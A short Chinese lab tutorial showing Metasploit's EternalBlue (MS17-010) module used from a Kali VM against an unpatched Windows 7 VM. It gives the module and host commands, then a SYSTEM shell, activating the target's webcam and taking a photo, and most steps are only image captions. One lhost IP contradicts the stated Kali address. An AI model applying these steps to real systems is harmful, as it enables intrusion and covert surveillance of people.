永恒之蓝漏洞,提权,拍照,打开摄像头

实验环境:虚拟机:kali-linux 和 windows 7 (未装补丁)

Kali IP:192.168.88.141
windows 7 IP:192.168.88.143
1、先查看kali有没有打开postgresql服务
永恒之蓝漏洞,提权,拍照,打开摄像头_第1张图片
上面这个是打开的,如没有,则执行service postgresql strat
2、kali-linux输入msfconsole启动msf(若不是root登陆需sudo提升权限)
永恒之蓝漏洞,提权,拍照,打开摄像头_第2张图片
命令提示行显示msf则启动成功
3、使用永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述
4、绑定靶机win7 IP 和kali IP
set rhost 192.168.88.143
set lhost 192.168.18.141
在这里插入图片描述
5、设置TCP连接
在这里插入图片描述
6、开始攻击
永恒之蓝漏洞,提权,拍照,打开摄像头_第3张图片
7、拿shell,且是系统权限
永恒之蓝漏洞,提权,拍照,打开摄像头_第4张图片
8、开win7摄像头
永恒之蓝漏洞,提权,拍照,打开摄像头_第5张图片
永恒之蓝漏洞,提权,拍照,打开摄像头_第6张图片
9、拍照
永恒之蓝漏洞,提权,拍照,打开摄像头_第7张图片

你可能感兴趣的:(windows,linux,渗透测试)